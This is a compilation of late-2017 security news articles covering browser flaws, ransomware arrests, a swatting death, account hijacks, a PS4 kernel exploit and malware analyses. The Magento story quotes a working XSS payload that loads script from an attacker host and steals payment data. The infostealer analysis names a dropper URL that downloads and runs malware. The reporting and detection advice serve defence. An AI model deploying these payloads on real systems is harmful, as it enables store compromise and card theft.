“Facebookmail.com is a common domain that Facebook uses to send notifications when we detect an attempt to log in to your account or change a password. If you’re unsure if an email you received was from Facebook, you can check its legitimacy by visiting facebook.com/settings to view a list of security-related emails that have been recently sent.” states the announcement published by Facebook.

Even if threat actors are able to disguise emails, to make them look like official messages sent by Facebook, the new Facebook security feature will help users to identify phishing attacks.

Crooks use phishing attacks to obtain victim’s credentials, access their profile, and perform a wide range of fraudulent activities.

Compromised accounts could be used to send out phishing messages or to spread malware.

Users that will discover email scam pretending to be sent from the Facebook platform can report it to phish@facebook.com.

If your account has been compromised due to a phishing attempt, visit facebook.com/hacked.

“If you’ve checked this tool and determined that an email you received is fake, we encourage you to report it to phish@facebook.com, and if you believe your account has been compromised due to a phishing attempt, you may attempt to regain access to your account at: facebook.com/hacked. ” concludes Facebook.


Critical "Same Origin Policy" Bypass Flaw Found in Samsung Android Browser
30.12.2017 thehackernews Android

A critical vulnerability has been discovered in the browser app comes pre-installed on hundreds of millions of Samsung Android devices that could allow an attacker to steal data from browser tabs if the user visits an attacker-controlled site.
Identified as CVE-2017-17692, the vulnerability is Same Origin Policy (SOP) bypass issue that resides in the popular Samsung Internet Browser version 5.4.02.3 and earlier.
The Same Origin Policy or SOP is a security feature applied in modern browsers that is designed to make it possible for web pages from the same website to interact while preventing unrelated sites from interfering with each other.
In other words, the SOP makes sure that the JavaScript code from one origin should not be able to access the properties of a website on another origin.

 

The SOP bypass vulnerability in the Samsung Internet Browser, discovered by Dhiraj Mishra, could allow a malicious website to steal data, such as passwords or cookies, from the sites opened by the victim in different tabs.
"When the Samsung Internet browser opens a new tab in a given domain (say, google.com) through a Javascript action, that Javascript can come in after the fact and rewrite the contents of that page with whatever it wants," researchers from security firm Rapid7 explained.
"This is a no-no in browser design since it means that Javascript can violate the Same-Origin Policy, and can direct Javascript actions from one site (controlled by the attacker) to act in the context of another site (the one the attacker is interested in). Essentially, the attacker can insert custom Javascript into any domain, provided the victim user visits the attacker-controlled web page first."
Attackers can even snag a copy of your session cookie or hijack your session and read and write webmail on your behalf.
Mishra reported the vulnerability to Samsung, and the company replied that "the patch is already preloaded in our upcoming model Galaxy Note 8, and the application will be updated via Apps store update in October."
Meanwhile, Mishra, with the help of Tod Beardsley and Jeffrey Martin from Rapid7 team, also released an exploit for Metasploit Framework.
Rapid7 researchers have also published a video demonstrating the attack.
Since the Metasploit exploit code for the SOP bypass vulnerability in the Samsung Internet Browser is now publicly available, anyone with less technical knowledge can use and exploit the flaw on a large number of Samsung devices, most of which are still using the old Android Stock browser.


CEO of Major UK-Based Cryptocurrency Exchange Kidnapped in Ukraine
30.12.2017 thehackernews Cyber

Pavel Lerner, a prominent Russian blockchain expert and known managing director of one of the major crypto-exchanges EXMO, has allegedly been kidnapped by "unknown" criminals in the Ukranian capital of Kiev.
According to Ukraine-based web publication Strana, Lerner, 40-year-old citizen of Russia, was kidnapped on December 26 when he was leaving his office in the center of town (located on the Stepan Bandera Avenue).
Unknown kidnappers in dark clothes and balaclavas dragged Lerner in their black Mercedes-Benz Vito brand (state number AA 2063 MT) car and drove away in an unknown direction.
The information comes from an anonymous source in Ukrainian law enforcement agencies, though multiple investigations are currently underway to find out why and by whom Lerner was kidnapped.
Lerner is a recognized IT specialist in Ukraine who led a number of startups related to blockchain technology development and mining operations.
Lerner is also the managing director of EXMO, a major UK-based cryptocurrency exchange founded in 2013 and well-known with Russians for accepting ruble payments.
Law enforcers in Kiev have begun an investigation and are currently conducting search operation, working out all possible leads in the case which is described as the kidnapping.
EXMO's representatives confirmed media reports in a statement to a local crypto journal BitNovosti and appealed for any information that could lead to the finding of Lerner.
The company representatives also assured its customers that EXMO operations were not affected by the incident and that Lerner did not have direct access to any cryptocurrency account or other personal data.
"We are doing everything possible to speed up the search of Pavel Lerner. Any information regarding his whereabouts is very much appreciated," PR-department of EXMO said.
"Despite the situation, the exchange is working as usual. We also want to stress that nature of Pavel’s job at EXMO doesn’t assume access either to storages or any personal data of users. All users funds are absolutely safe."
Lerner case has been considered to be yet another case involving a Russian national with cryptocurrency background.
In July this year, Alexander Vinnik, a 38-year-old Russian citizen and operator of cryptocurrency exchange BTC-e, was detained in Northern Greece at the request of US law enforcement authorities. The Greece court in October also ruled to extradite Vinnik to the United States.
The US authorities accused Vinnik of crimes related to the hack of Mt. Gox, which was shut down in 2014 following a massive series of mysterious robberies, which totaled at least $375 million in Bitcoin.


Two Romanians Charged With Hacking Police CCTV Cameras Before Trump Inauguration
30.12.2017 thehackernews Crime

Remember how some cybercriminals shut down most of Washington D.C. police's security cameras for four days ahead of President Donald Trump's inauguration earlier this year?
Just a few days after the incident, British authorities arrested two people in the United Kingdom, identified as a British man and a Swedish woman, both 50-year-old, on request of U.S. officials.
But now US federal court affidavit has revealed that two Romanian nationals were behind the attack that hacked into 70% of the computers that control Washington DC Metropolitan Police Department's surveillance camera network in January this year, CNN reports.
The two suspects—Mihai Alexandru Isvanca, 25, and Eveline Cismaru, 28—were arrested in Bucharest on December 15 on charges of conspiracy to commit wire fraud and various forms of computer fraud.
According to the criminal complaint unsealed in Washington, the pair hacked 123 of the Metropolitan Police Department's 187 outdoor surveillance cameras used to monitor public areas in D.C. by infecting computers with ransomware in an effort to extort money.
Ransomware is an infamous piece of malicious software that has been known for locking up computer files and then demanding a ransom (usually in Bitcoins) to help victims unlock their files.
The cyber attack occurred just days before the inauguration of President Donald Trump and lasted for almost four days, eventually leaving the CCTV cameras out of recording anything between 12 and 15 January 2017.
Instead of fulfilling ransom demands, the DC police department took the storage devices offline, removed the infection and rebooted the systems across the city, ensuring that the surveillance camera system was secure and fully operational.
"This case was of the highest priority due to its impact on the Secret Service’s protective mission and its potential effect on the security plan for the 2017 Presidential Inauguration," the Justice Department said.
"The investigation revealed no evidence that any person’s physical security was threatened or harmed due to the disruption of the MPD surveillance cameras."
The affidavit, dated December 11, mentions the defendants used two types of cryptocurrency ransomware variants—Cerber and Dharma. Other evidence also revealed a scheme to distribute ransomware by email to at least 179,000 email addresses.
"According to the complaint, further investigation showed that the two defendants, Isvanca and Cismaru, participated in the ransomware scheme using the compromised MPD surveillance camera computers, among others," the Justice Department said.
"The investigation also identified certain victims who had received the ransomware or whose servers had been accessed during the scheme."
However, it is still unclear whether the pair arrested was solely behind the attack or were part of a more comprehensive cybercriminal network.
While Isvanca remains in custody in Romania, Cismaru is under house arrest pending further legal proceedings, according to the Justice Department.
If extradited and convicted, the Romanian defendants could face a maximum of 20 years in prison.


It’s a mystery, member of the Lurk gang admits creation of WannaCry ransomware for intelligence agencies
30.12.2017 securityaffairs
Ransomware

A hacker belonging to the Lurk cybercrime gang admits the creation of WannaCry ransomware and DNC hack on request of intelligence agencies.
In an interview to Dozhd TV channel, one of the members of the Lurk crime group arrested in the Russian city of Ekaterinburg, Konstantin Kozlovsky, told that he was one of the authors of the dreaded WannaCry ransomware and that the job was commissioned by intelligence agencies.

kozlovskii_%20wannacry

The Lurk cybercrime gang was known in the criminal ecosystem because it developed, maintained and rent the infamous Angler Exploit Kit. A joint investigation conducted by the Russian Police and the Kaspersky Lab allowed the identification of the individuals behind the Lurk malware. The members of the Lurk cybercrime crew were arrested by Russian law enforcement in the summer of 2016.

Law enforcement arrested the suspects in June, authorities accused them of stealing around $45 million USD from Russian financial institutions by using the Lurk banking trojan.

According to the Cisco Talos researchers, after the arrests of the individuals behind the Lurk banking trojan, it has been observed a rapid disappearance of the Angler EK in the wild.

According to Kozlovsky, WannaCry was developed to target corporate networks and rapidly spread by infecting the larger number of machines. The intent was to paralyze the activities of the target organization with just ‘one button.’

“The virus was tested on computers of the Samolet Development company which is engaged in construction of housing in Moscow area. Also hackers planned to hack a network of Novolipetsk Steel and to try to stop its blast furnaces.” reported the Russian Website crimerussia.com.

Konstantin Kozlovsky, that is now being held in a pre-trial detention center, already admitted to have worked for intelligence agencies.

Earlier the hacker told that cracked servers of the Democratic party of the USA and e-mail of Hillary Clinton for the Russian Intelligence Agency FSB.

Kozlovsky explained that the actions were coordinated by Dmitry Dokuchaev from the Center of Information Security of the FSB. Dmitry Dokuchaev is one of the two Russian intelligence officers (Dmitry Dokuchaev and Igor Sushchin) charged in March by the US Justice Department along with hackers Alexsey Belan and Karim Baratov for breaking into Yahoo servers in 2014.

Dokuchaev through his lawyer denied knowing Kozlovsky.

The Kozlovsky’s story is quite strange, he is currently under the custody of Russian authorities and anyway continues to accuse the FSB also of other hacks. Is this a new disinformation campaign? Who and why is orchestraing it?

In December, the US Government attributes the massive attack Wannacry to North Korea.

The news of the attribution was first reported by The Wall Street Journal, according to the US Government, the WannaCry attack infected millions of computers worldwide in May is an act of Information Warfare.

WannaCry infected 200,000 computers across 150 countries in a matter of hours last week, it took advantage of a tool named “Eternal Blue”, originally created by the NSA, which exploited a vulnerability present inside the earlier versions of Microsoft Windows. This tool was soon stolen by a hacking group named “Shadow Brokers” which leaked it to the world in April 2017.

wannacry%20ransomware%20medical%20devices

WannaCry ransomware on a Bayer radiology system – Source Forbes


Chinese censorship – authorities have shut down 13,000 websites since 2015
30.12.2017 securityaffairs BigBrothers

China continues to strengthen its online censorship, it has shut down or revoked the licenses of 13,000 websites since 2015 for violating the country’s internet rules.
State media also reported that service providers have closed nearly 10 million internet accounts for “violating service protocol.”

“These moves have a powerful deterrent effect,” Xinhua quoted Wang Shengjun, vice chairman of the Standing Committee of the National People’s Congress (NPC), as saying.

Chinese authorities have summoned more than 2,200 websites operators since 2015. According to Xinhua more than 10 million people who refused to register using their real names had internet or other telecoms accounts suspended over the past five years.

Within China, websites must register with authorities and are responsible for “ensuring the legality of any information” that is published on them.

These data confirm the strict control powered by China on the digital lives of its citizens.

According to Freedom House, China is the country with the most restrictive online use policies.


The new Chinese cyber security law gives more power to the Government and enforces new rules especially for those companies that produce software that could be used to circumvent the country’s censorship.

The Great Firewall project already blocked access to more hundreds of the world’s 1,000 top websites, including Google, Facebook, Twitter, and Dropbox.

Recently the Chinese authorities have sentenced a man to five-and-a-half years in prison for selling a VPN service without the authorization.

Since early this year, the Chinese authorities started banning “unauthorized” VPN services, any company offering such type of service in the country must obtain an appropriate license from the government.

People resident in the country make use of VPN and Proxy services to bypass the censorship implemented by the Great Firewall and access website prohibited by the Government without revealing their actual identity.


A 28-year-old Kansas man was shot and killed by police in a swatting attack
30.12.2017 securityaffairs Hacking

Andrew Finch, a 28-year-old man from Wichita, Kansas, was killed last week in a swatting attack by police who were responding to a call reporting a hostage situation at the man’s house.
All begun on the evening of December 28, two gamers bet they could complete the Call of Duty game by ‘swatting’ each other, but one of them gave the wrong address to a nearby known swatter.

“The two CoD players reportedly got into an argument over a small money loss on UMG’s wager platform online (view match) and threatened to swat each other, with one of the players sending the other incorrect details of an address nearby to a known swatter, who was reportedly responsible for the CWL Dallas bomb hoax evacuations.” reported the website Dexerto.

29 Dec

Christopher Duarte

@Parasite
Unbelievable, two kids in the community got in a verbal dispute and thought it would be funny to swat each other which resulted in an innocent man being killed by police officers responding to the swat calling. Disgusted.


Christopher Duarte

@Parasite
pic.twitter.com/ZCTqzucWwnhttp://www.kansas.com/news/local/crime/article192081124.html …

5:29 AM - Dec 29, 2017
View image on TwitterView image on Twitter
47 47 Replies 191 191 Retweets 347 347 likes
Twitter Ads info and privacy
Yes, you heard right, the absurd death was the result of a “swatting” attack gone wrong.

According to the popular expert Brian Krebs, the dispute originated on Twitter, one of the parties allegedly using the Twitter handle “SWauTistic” threatened to swat another user who handles the account “7aLeNT“. @7aLeNT dared someone to swat him, but then tweeted an address that was not his own.

“Swautistic responded by falsely reporting to the Kansas police a domestic dispute at the address 7aLenT posted, telling the authorities that one person had already been murdered there and that several family members were being held hostage.” wrote Krebs.

“Not long after that, Swautistic was back on Twitter saying he could see on television that the police had fallen for his swatting attack. When it became apparent that a man had been killed as a result of the swatting, Swautistic tweeted that he didn’t get anyone killed because he didn’t pull the trigger (see image above).

Swautistic soon changed his Twitter handle to @GoredTutor36, but KrebsOnSecurity managed to obtain several weeks’ worth of tweets from Swautistic before his account was renamed. Those tweets indicate that Swautistic is a serial swatter — meaning he has claimed responsibility for a number of other recent false reports to the police.”

Kansas%20Swatting

“I heard my son scream, I got up, and then I heard a shot,” said Lisa Finch, the mother of the shooting victim, in a video interview with the Wichita Eagle.

Police then handcuffed Lisa Finch and took her outside, along with “my roommate and my granddaughter, who witnessed the shooting and had to step over her dying uncle’s body.”

Andrew was unarmed and the police did not find any weapon in the house.

A typical “Swatting” scenario sees someone calls police from the target’s home and describes a fake emergency situation urging the intervention of the law enforcement. This is what has happened at the Finch’s house.

“We were told that someone had an argument with their mother, and dad was accidentally shot and that now that person was holding brother, sister, and mother hostage,” a police official told reporters.

According to the official, Andrew Finch “came to the front door” and “one of our officers discharged his weapon,” killing the man, but he declined to explain why the agent opened the fire.

To be clear, Andrew Finch was not a Call of Duty player and he was no linked with the two gamers.

The police are investigating the case to track the person who called them first reporting the fake emergency.

The recording of the call to 911 operators that prompted this tragedy can be heard at this link.

Swatting is a serious problem, a member of Congress has proposed legislation to combat this illegal practice.

Back in 2013, the popular expert Brian Krebs was the victim of a swatting attack, fortunately with a happy ending.


Samsung Android Browser is affected by a critical SOP bypass issue, a Metasploit exploit code is available
30.12.2017 securityaffairs Android

The browser app pre-installed on Samsung Android devices is affected by a critical SOP bypass issue, tracked as CVE-2017-17692.
The browser app pre-installed on Android devices is affected by a critical flaw, tracked as CVE-2017-17692, that could be exploited by an attacker to steal data from browser tabs if the user visits an attacker-controlled site.

The SOP bypass issue in the Samsung Internet Browser was discovered by the security researcher Dhiraj Mishra.

The CVE-2017-17692 vulnerability is a Same Origin Policy (SOP) bypass issue that affects the Samsung Internet Browser version 5.4.02.3 and earlier.
Samsung%20SOP%20bypass%20issue
The Same Origin Policy is one of the most important security mechanisms implemented in modern browsers, the basic idea behind the SOP is the javaScript from one origin should not be able to access the properties of a website on another origin.

A SOP bypass occurs when a sitea.com is somehow able to access the properties of siteb.com such as cookies, location, response etc.

An attacker can copy victim’s session cookie or hijack his session and read and write webmail on your behalf.

Mishra developed a Metasploit Module for the exploitation of the SOP bypass issue and reported the flaw to the MITRE to assign CVE.

Mishra also reported the flaw to Samsung, who acknowledged it and confirmed that “the patch is already preloaded in our upcoming model Galaxy Note 8, and the application will be updated via Apps store update in October.“

Here is the Source Code for Bypassing Same Origin Policy in Samsung Internet Browser in Metasploit,

“When the Samsung Internet browser opens a new tab in a given domain (say, google.com) through a Javascript action, that Javascript can come in after the fact and rewrite the contents of that page with whatever it wants,” reads a blog post published by researchers from security firm Rapid7.

“This is a no-no in browser design since it means that Javascript can violate the Same-Origin Policy, and can direct Javascript actions from one site (controlled by the attacker) to act in the context of another site (the one the attacker is interested in). Essentially, the attacker can insert custom Javascript into any domain, provided the victim user visits the attacker-controlled web page first.”

The experts from Rapid7 have also published a video PoC of the attack.


The availability online of the Metasploit exploit code pose a serious risk to Android users that are still using the old Android Stock browser.


A Kernel Exploit for Sony PS4 Firmware 4.05 is available online
30.12.2017 securityaffairs
Exploit

The developer SpecterDev finally released a fully-functional kernel exploit for PlayStation 4 (firmware 4.05) dubbed ‘namedobj’.
Good news for PlayStation gamers, the developer SpecterDev finally released a fully-functional kernel exploit for PlayStation 4 (firmware 4.05) dubbed ‘namedobj’.

PS4 gamers who are running firmware version lower than 4.05 need to update their gaming console to trigger the exploit.

The Kernel exploit was released two months after Team Fail0verflow revealed the technical details about the first PS4 Kernel Exploit.

The kernel exploit ‘namedobj’ is now available on Github, it works for the PlayStation 4 on 4.05FW and allows users to run arbitrary code on the device.

“In this project you will find a full implementation of the “namedobj” kernel exploit for the PlayStation 4 on 4.05. It will allow you to run arbitrary code as kernel, to allow jailbreaking and kernel-level modifications to the system. This release however, does not contain any code related to defeating anti-piracy mechanisms or running homebrew. This exploit does include a loader that listens for payloads on port 9020 and will execute them upon receival.” reads the description published on GitHub.

PS4%20Kernel%20Exploit

The availability of the kernel exploit could allow developers to write a working jailbreak and kernel-level modifications to the system.

Jailbreaking allows removing hardware restrictions implemented by the operating system, it allows users to run custom code on the console and install mods, games, and third-party applications bypassing the anti-piracy mechanisms implemented by Sony.

“This release, however, does not contain any code related to defeating anti-piracy mechanisms or running homebrew,” SpecterDev said.

“This exploit does include a loader that listens for payloads on port 9020 and will execute them upon receival.”

Reading the “Notes” we can notice that the developer warns that the exploit should not work for some users.

“This exploit is actually incredibly stable at around 95% in my tests. WebKit very rarely crashes and the same is true with kernel. I’ve built in a patch so the kernel exploit will only run once on the system. You can still make additional patches via payloads,” SpecterDev warned.

At this point, experts at Sony will work to identify the flaws triggered by the kernel exploit and fix them.


Pavel Lerner, head of EXMO cryptocurrency exchange, was kidnapped in Ukraine
30.12.2017 securityaffairs Cyber

According to Ukrainian media, the head of the EXMO cryptocurrency exchange Pavel Lerner has been kidnapped in Kiev, the police is investigating the case.
According to Ukrainian media, the Russian IT expert Pavel Lerner has been kidnapped in Kiev.

Pavel Lerner (40) is a and managing director EXMO, one of the largest cryptocurrency exchanges, and according to a Ukrainian media Strana.ua he stopped responding to phone calls on December 26.

“According to the applicant in the case, Lerner was abducted near his workplace – an office center in Stepan Bandery Street (before renaming – Moscow Avenue). The programmer was dragged into the car of Mercedes-Benz Vito brand (state number AA 2063 MT) by unknown persons in dark clothes and balaclava, and taken away to an unknown destination.” states the Strana.ua.

Lerner has been kidnapped while he was leaving his office in Stepan Bandera Prospect in Kiev.

The IT specialist led a number of startups, related to blockchain technology and cryptocurrency mining.

Ukrainian police are investigating the case, at the time I was writing it is still unclear who and why kidnapped the man.

EXMO confirmed the news of the kidnapping and clarified that company operations were not affected by what has happened. EXMO also added that Lerner did not have direct access to any cryptocurrency account or other personal data.

“We are doing everything possible to speed up the search of Pavel Lerner. Any information regarding his whereabouts is very much appreciated,” PR-department of EXMO said.

“Despite the situation, the exchange is working as usual. We also want to stress that nature of Pavel’s job at EXMO doesn’t assume access either to storages or any personal data of users. All users funds are absolutely safe.”


The Twitter account of the popular security expert John McAfee was hacked
30.12.2017 securityaffairs
Social

The official Twitter account of popular cyber security expert John McAfee was hacked today, hackers used it to promote alternative cryptocurrencies.
The official Twitter account of legendary security expert John McAfee was hacked today, attackers used it to send several tweets promoting alternative cryptocurrencies like Siacoin, NXT, XRP, PTOY, and BAT.

At the time of writing, there aren’t further info related to the attack, John McAfee explained that its account was protected with a two-factor authentication process.

This suggests that the attackers have found a way to obtain the authentication code sent by Twitter, this is possible by compromising the mobile device or via an SS7 attack.

In this latter scenario, hackers can exploit a flaw in the SS7 protocol to steal the victim’s identity on the messaging services with just basic skills.

The principal instant messaging services, including WhatsApp and Telegram, rely on the SMS authentication as the primary security verification mechanism, which is routed through SS7 signalling. This means that hackers exploit the SS7 to compromise the verification mechanism and take over the victim’s account and impersonate him.

According to McAfee, someone has compromised his smartphone.

28 Dec

Adam Eivy \[._.]/
@antic
Replying to @officialmcafee
So how did it happen? Was this a breach of twitter, of your 2-factor service (e.g. phone provider). Did you not have 2-factor on for some reason? Curious if this is something that could affect others.


John McAfee

@officialmcafee
If it can affect me it can affect anyone. Most likely my phone was compromised

4:40 AM - Dec 28, 2017
24 24 Replies 2 2 Retweets 28 28 likes
Twitter Ads info and privacy



John McAfee

@officialmcafee
Urgent: My account was hacked. Twitter has been notified. The coin of the day tweet was not me. As you all know... I am not doing a coin of the day anymore!!!!

12:04 AM - Dec 28, 2017
3,922 3,922 Replies 2,726 2,726 Retweets 7,997 7,997 likes
Twitter Ads info and privacy
“The first indication that I had been hacked was turning on my cell phone and seeing the attached image,” he told BBC.


McAfee added that he was on a boat when his account was hacked and for this reason, he was not able to contact the AT&T.
“I knew at that point that my phone had been compromised.” he added

“I was on a boat at the time and could not go to my carrier (AT&T) to have the issue corrected.

“All that the hacker did was compromise my Twitter account. It could have been worse.”

John knows very well that he is a privileged target of several types of attackers, including haters.


John McAfee

@officialmcafee
Though I am a security expert, I have no control over Twitter's security. I have haters. I am a target. People make fake accounts, fake screenshots, fake claims. I am a target for hackers who lost money and blame me. Please take responsibility for yourselves. Adults only please.

4:32 AM - Dec 28, 2017
1,368 1,368 Replies 798 798 Retweets 6,453 6,453 likes
Twitter Ads info and privacy
McAfee’s account was fully restored, Twitter hasn’t commented the incident.
The reality is that is not complex for a persistent attacker to compromise your social media account.


Hackers are attempting to breach Magento stores through the Mirasvit Helpdesk extension
30.12.2017 securityaffairs Hacking

The cybersecurity expert Willem de Groot reported cyber attacks against Magento websites running the popular helpdesk extension ‘Mirasvit Helpdesk.’
de Groot observed attackers sending a message like this to Magento merchants:

Hey, I strongly recommend you to make a redesign! Please contact me if you need a good designer! – knockers@yahoo.com

The message contains a specially crafted sender that triggers an XSS attack.

“Upon closer examination, the message contains a specially crafted sender that contains an XSS attack: an attempt to take control of the backend of a Magento store (archived copy here):”

<script src="https://helpdeskjs.com/jquery.js"></script>@gmail.com
“This exploits a flaw in the popular Mirasvit Helpdesk extension. When a helpdesk agent opens the ticket, it will run the code in the background, in the browser of the agent.” wrote de Groot.

The attack exploits one of the flaws discovered in September 2017 by the researchers at the security firm WebShield that affected all versions of the Mirasvit Helpdesk extension until 1.5.2. The company addressed the issued with the release of the version 1.5.3.

When a helpdesk agent opens the ticket, it will run the code for the XSS attack in the background, then a malicious code is added to the footer of the Magento template. In this way, the attacker is able to get its code executed on any page accessed by visitors. The malware used in the attacks spotted by the expert was designed to intercept payments data and send it offshore as the customer types it into the payment form.

“Ultimately, the malware intercepts payments data and send it offshore as the customer types it into the payment form.” de Groot added.

“This attack is particularly sophisticated, as it is able to bypass many security measures that a merchant might have taken. For example, IP restriction on the backend, strong passwords, 2-Factor-Authentication and using a VPN tunnel will not block this attack.”

Mirasvit%20Helpdesk

de Groot suggested to run the following query on the database to find XSS attacks:

SELECT *
FROM `m_helpdesk_message`
WHERE `customer_email` LIKE '%script%'
OR `customer_name` LIKE '%<script%'
OR `body` LIKE '%<script%' \G
and search access logs for modifications of templates through the backend:

$ grep system_config/save/section/design access.log

The expert also published a copy of the malware on GitHub.

Mirasvit published a blog post warning its customers and urging them to update their installs.


Ancestry.com Responds Well To RootsWeb Data Breach
30.12.2017 securityaffairs Incindent

The popular expert Troy Hunt notified the Ancestry.com security team of an unsecured file on a RootsWeb server containing “email addresses/username and password combinations as well as usernames from a RootsWeb.com server”.
When you think of personal security questions, you might think of your mother’s surname or other family information that normally isn’t shared — unless you are building your family tree with an online genealogy search. When Ancestry.com notifies its users of a potential security breach it sounds worse than most.

Ancestry.com is a company with millions of customers that use their online tools to research their family tree. The company also hosts servers for RootsWeb, a free, community-driven collection of genealogy tools and discussion forums. On December 20th, 2017, Troy Hunt, of HaveIBeenPwned.com, notified the Ancestry.com security team of an unsecured file on a RootsWeb server containing “email addresses/username and password combinations as well as usernames from a RootsWeb.com server”, and a quick and detailed investigation ensued.

website%20Ancestry.com

According to Ancestry.com’s blog post detailing the incident, the security team reviewed the file identified by Hunt, and determined that it does contain login details for 300,000 accounts although they describe, “the majority of the information was old.” They continued their investigation and determined that of the 300,000 accounts, 55,000 had been reused by users on both the RootsWeb and Ancestry websites. Most of the 55,000 were “from free trial, or currently unused accounts,” but 7,000 login credentials were in use by active Ancestry.com users. Ancestry.com supports millions of users so this breach represents less than 1% of their users, however, they still took the potential impacts seriously and acted accordingly.

The internal investigation points to the RootsWeb surname list information service which Ancestry.com retired earlier this year. “We believe the intrusion was limited to the RootsWeb surname list, where someone was able to create the file of older RootsWeb usernames and passwords as a direct result of how part of this open community was set up, an issue we are working to rectify”, according to the blog post by Ancestry.com CISO, Tony Blackman.

He continued with, “We have no reason to believe that any Ancestry systems were compromised. Further, we have not seen any activity indicating the compromise of any individual Ancestry accounts.” According to Ancestry, the RootsWeb servers do not host any credit card or social insurance numbers so the potential impact of this breach appears to be minimized.

The RootsWeb website is currently offline while the Ancestry teams complete their investigation, make the appropriate configuration changes and “ensure all data is saved and preserved to the best of [their] ability.”

In addition, the Ancestry has locked the 55,000 accounts found in the exposed file, requiring users to change their passwords the next time they attempt to log on. They sent emails to all 55,000 email addresses advising them of the incident and recommended actions, and commit to “working with regulators and law enforcement where appropriate.”

To summarize, the Ancestry.com security team responded quickly when notified of a potential breach, determined the potential scope and impact, took swift action to minimize damages, notified impacted users, clearly and publicly described the event. Troy Hunt’s tweet describes it best, “Another data breach from years ago, this time from @Ancestry’s services. Really impressed with the way they handled this: I got in touch with them bang on 72 hours ago and they’ve handled it in an exemplary fashion.”


Troy Hunt

@troyhunt
Another data breach from years ago, this time from one of @Ancestry's services. Really impressed with the way they handled this: I got in touch with them bang on 72 hours ago and they've handled it in an exemplary fashion https://blogs.ancestry.com/ancestry/2017/12/23/rootsweb-security-update/ …


Two Romanians charged with infecting US Capital Police cameras with ransomware early this year
30.12.2017 securityaffairs
Ransomware

Two Romanian people have been arrested and charged with hacking into US Capital Police cameras ahead of the inauguration of President Trump.
Two Romanian people have been arrested and charged with hacking into control systems of the surveillance cameras for the Metropolitan Police Department in the US. The two suspects, Mihai Alexandru Isvanca, 25, and Eveline Cismaru, 28, hacked the US Capital Police cameras earlier this year.

A ransomware infected 70 percent of storage devices used by the Washington DC CCTV systems just eight days before the inauguration of President Donald Trump.

The attack occurred between 12 and 15 January, the ransomware infected 123 of 187 network video recorders, each controlling up to four CCTVs. IT staff was forced to wipe the infected systems in order to restore the situation, fortunately, the ransomware did not affect other components of the Washington DC network.

Capital%20Police%20cameras%20hacked

The first infections were discovered by the Police on Jan. 12 D.C. when the authorities noticed four camera sites were not functioning properly. Experts at the city technology office detected two distinct ransomware (Cerber and Dharma) in four recording devices, then they extended the analysis to the entire surveillance network and wiped all the infected equipment.

The duo was arrested in Bucharest on December 15 and charged with conspiracy and various forms of computer fraud.

According to an affidavit dated December 11, the two criminals acted in an effort “to extort money” in exchange for unlocking the surveillance system.

Prosecutors collected evidence that revealed a scheme to distribute ransomware by email to at least 179,000 email addresses.

“The investigation uncovered information that the MPD surveillance camera computers were compromised between Jan. 9 and Jan. 12, 2017, and that ransomware variants called “cerber” and “dharma” had been stored on the computers. Other evidence in the investigation revealed a scheme to distribute ransomware by email to at least 179,000 email addresses. ” reads the press release published by the DoJ.

Isvanca remains in custody in Romania and Cismaru is under house arrest pending further legal proceedings, the maximum penalty for a conspiracy to commit wire fraud is 20 years in prison.


Info Stealing – The cyber security expert Marco Ramilli spotted a new operation in the wild
30.12.2017 securityaffairs Cyber

The Italia cyber security expert Marco Ramilli, founder of Yoroi, published an interesting analysis of a quite new InfoStealer Malware delivered by eMail to many International Companies.
Attack attribution is always a very hard work. False Flags, Code Reuse and Spaghetti Code makes impossible to assert “This attack belongs to X”. Indeed nowadays makes more sense talking about Attribution Probability rather then Attribution by itself. “This attack belongs to X with 65% of attribution probability” it would be a correct sentence.
I made this quick introduction because the following analysis would probably take the reader to think about specific attribution, but it won’t be so accurate, so please be prepared to have not such a clear conclusions.

Today I’d like to show an interesting analysis of a quite new InfoStealer Malware delivered by eMail to many International Companies. The analysis shows up interesting Code Reuse capabilities, apparently originated by Japanese Attackers reusing an English Speaker Attacker source code. Again I have not enough artifacts to give attributions but only few clues as follows. In the described analysis, the original sample was delivered by sarah@labaire.co.za (with high probability a compromised South Africa account) to one of my spamming email addresses.

The obtained sample is a Microsoft Word document within macro in it. The macros were heavily obfuscated by using four rounds of substitutions and UTF-8 encoding charsets (which, by the way, is super annoying). The following image shows the obfuscated macro code with UTF-8 charsets.
Info%20Stealing
Stage 1: Obfuscation
By using oletools and “tons” of cups of coffee (to be awake until late night to make recursive steps) I finally was able to extract the invoked command, showed in the following image.
Info%20Stealing
Stage 1: Invoked Command
A fashionable powershell command drops and executes: hxxp://ssrdevelopments.co.za/a2/off.exe. Powershell seems to be a “must have” in contemporary Malware. Analyzing the “dropping” url and tracking down the time it is in “Index Of” mode (2017-0-13), I suspect it is not a compromised website rather a crafted web server or a compromised host of a dead company.

Info Stealing
Dropping Web Site
By surfing the Malware propagator website I founded out many malicious executables (sees IoC section) each one showing up specific behaviors such as: password stealers, RAT, and Banking Trojans. Even if the samples were developed for different targets, all of them shared the following basic behaviors:

Check for victims IP address before getting into Malicious activities (maybe related to targeted activities)
Install itself into auto execution path
Tries to fingerprint the target system (such as CPU, HD, Memory, Username, System, etc..)
Sniff for Keystrokes
I’d like to write a simple analysis for each found sample, but today time is not my friend, so let’s focalize to one of the malicious samples. Let’s get done the received sample by digging into the “second stage” dropped by the pPowerShell “first stage” from ssrdevelopments.co.za/a2/off.exe. After few seconds on second stage (off.exe) it became clear that it was a .NET software. By reversing the interpreted .NET language some clear text comments appeared interesting. Japanese language such as comments and variable names came out from static analysis. Let’s have a look to them.

Info%20Stealing
Stage 2: Apparently Japanese characters
While the sample pretends to be compiled from “Coca-Cola Enterprise” (maybe a target operation against Coca-Cola ? Or a targeted operation agains Coca-Cola Suppliers ? So why it ended up to my inbox ? Anyway … ) google translator suggests me that Japanese characters are in text: such as the “Entry Point”, “Class names” and “Function Names”.
Info%20Stealing
Stage 2: Japanese Names and Self Encoding Structures
It was not hard to figure out that Stage 2 was auto-extracting bytes from itself (local variables) and saving them back to hard drive after having set up auto execution registry key on windows local registry. The following image shows the xoring function used to decrypt converted bytes to the real payload.
Info%20Stealing
Stage 2: Xoring function to extract Stage 3
On my run, the xored payload took the name of GIL.exe; another .NET executable. We are now facing the third stage. By analyzing the decompiled sample it became clear that:

The coding style was quite different from the previous stage (Stage 2)
The implementation style was different from the previous stage as well
The sample was interested in information about the user, the machine, the web services on the PC and to many more windows specific parameters.
Info%20Stealing
Stage 3: New Language in Strings and Class names

Info%20Stealing
Stage 3: New Code Style
